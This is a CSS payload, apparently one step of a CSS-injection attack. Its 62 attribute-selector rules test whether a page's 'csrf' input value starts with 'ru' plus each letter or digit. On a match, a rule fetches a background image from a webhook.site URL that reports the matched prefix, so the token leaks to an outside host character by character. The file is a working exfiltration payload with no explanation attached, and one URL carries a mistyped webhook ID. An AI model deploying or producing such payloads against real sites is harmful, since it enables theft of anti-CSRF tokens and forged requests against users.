/* ru */
input[name="csrf"][value^="rua"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rua'); }
input[name="csrf"][value^="rub"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rub'); }
input[name="csrf"][value^="ruc"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruc'); }
input[name="csrf"][value^="rud"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rud'); }
input[name="csrf"][value^="rue"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rue'); }
input[name="csrf"][value^="ruf"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruf'); }
input[name="csrf"][value^="rug"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rug'); }
input[name="csrf"][value^="ruh"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruh'); }
input[name="csrf"][value^="rui"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rui'); }
input[name="csrf"][value^="ruj"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruj'); }
input[name="csrf"][value^="ruk"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruk'); }
input[name="csrf"][value^="rul"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rul'); }
input[name="csrf"][value^="rum"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rum'); }
input[name="csrf"][value^="run"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=run'); }
input[name="csrf"][value^="ruo"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruo'); }
input[name="csrf"][value^="rup"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rup'); }
input[name="csrf"][value^="ruq"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruq'); }
input[name="csrf"][value^="rur"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rur'); }
input[name="csrf"][value^="rus"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rus'); }
input[name="csrf"][value^="rut"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rut'); }
input[name="csrf"][value^="ruu"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruu'); }
input[name="csrf"][value^="ruv"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruv'); }
input[name="csrf"][value^="ruw"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruw'); }
input[name="csrf"][value^="rux"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=rux'); }
input[name="csrf"][value^="ruy"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruy'); }
input[name="csrf"][value^="ruz"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruz'); }
input[name="csrf"][value^="ruA"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruA'); }
input[name="csrf"][value^="ruB"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruB'); }
input[name="csrf"][value^="ruC"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruC'); }
input[name="csrf"][value^="ruD"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruD'); }
input[name="csrf"][value^="ruE"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruE'); }
input[name="csrf"][value^="ruF"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruF'); }
input[name="csrf"][value^="ruG"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruG'); }
input[name="csrf"][value^="ruH"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruH'); }
input[name="csrf"][value^="ruI"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruI'); }
input[name="csrf"][value^="ruJ"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruJ'); }
input[name="csrf"][value^="ruK"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruK'); }
input[name="csrf"][value^="ruL"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruL'); }
input[name="csrf"][value^="ruM"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruM'); }
input[name="csrf"][value^="ruN"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruN'); }
input[name="csrf"][value^="ruO"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruO'); }
input[name="csrf"][value^="ruP"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruP'); }
input[name="csrf"][value^="ruQ"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruQ'); }
input[name="csrf"][value^="ruR"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-889956362f73?c=ruR'); }
input[name="csrf"][value^="ruS"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruS'); }
input[name="csrf"][value^="ruT"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruT'); }
input[name="csrf"][value^="ruU"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruU'); }
input[name="csrf"][value^="ruV"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruV'); }
input[name="csrf"][value^="ruW"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruW'); }
input[name="csrf"][value^="ruX"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruX'); }
input[name="csrf"][value^="ruY"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruY'); }
input[name="csrf"][value^="ruZ"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ruZ'); }
input[name="csrf"][value^="ru0"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ru0'); }
input[name="csrf"][value^="ru1"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ru1'); }
input[name="csrf"][value^="ru2"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ru2'); }
input[name="csrf"][value^="ru3"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ru3'); }
input[name="csrf"][value^="ru4"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ru4'); }
input[name="csrf"][value^="ru5"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ru5'); }
input[name="csrf"][value^="ru6"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ru6'); }
input[name="csrf"][value^="ru7"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ru7'); }
input[name="csrf"][value^="ru8"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ru8'); }
input[name="csrf"][value^="ru9"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=ru9'); }